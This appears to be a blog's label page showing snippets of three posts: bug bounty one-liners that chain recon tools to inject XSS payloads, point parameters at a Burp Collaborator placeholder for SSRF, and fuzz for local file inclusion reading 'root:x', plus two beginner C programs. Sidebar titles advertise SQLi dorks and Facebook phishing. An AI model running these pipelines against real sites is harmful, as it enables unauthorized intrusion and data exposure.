Posts

Showing posts with the label C

Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...

How to Find Number of Time Element Found in Array in C

 #include <stdio.h> int main() {          int arr[10], n, i;      int number, count;      printf("Enter elements of the Array : \n");      scanf("%d", &n);      printf("Enter array elements : \n ");      for(i=0; i<n; i++){       printf("Enter Element %d : ", i+1);       scanf("%d", &arr[i]); } printf("Enter value to find number of times element : "); scanf("%d", &number); count=0; for(i=0; i<n; i++){ if(arr[i]==number){ count++; } } printf("Your selected %d element is found in the array %d times \n ",number,count); return 0; }     

Time Calculation || Time Calculator in C

Copy the Source Code and Run on your Editor....  #include <stdio.h> int main() { int Hour; int Minute; int Second; int TotalTimeInSeconds; printf("Enter Seconds\n"); scanf("%d", &Second); printf("Enter Minutes\n"); scanf("%d", &Minute); printf("Enter Hours\n"); scanf("%d", &Hour); printf("Total Time in Seconds is %d",(Hour*60*60)+(Minute*60)+Second); return 0; }

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

How to Hack Facebook Account New Method 2021 || Advanced Phishing Attack

Bug BOunty Helpful Commands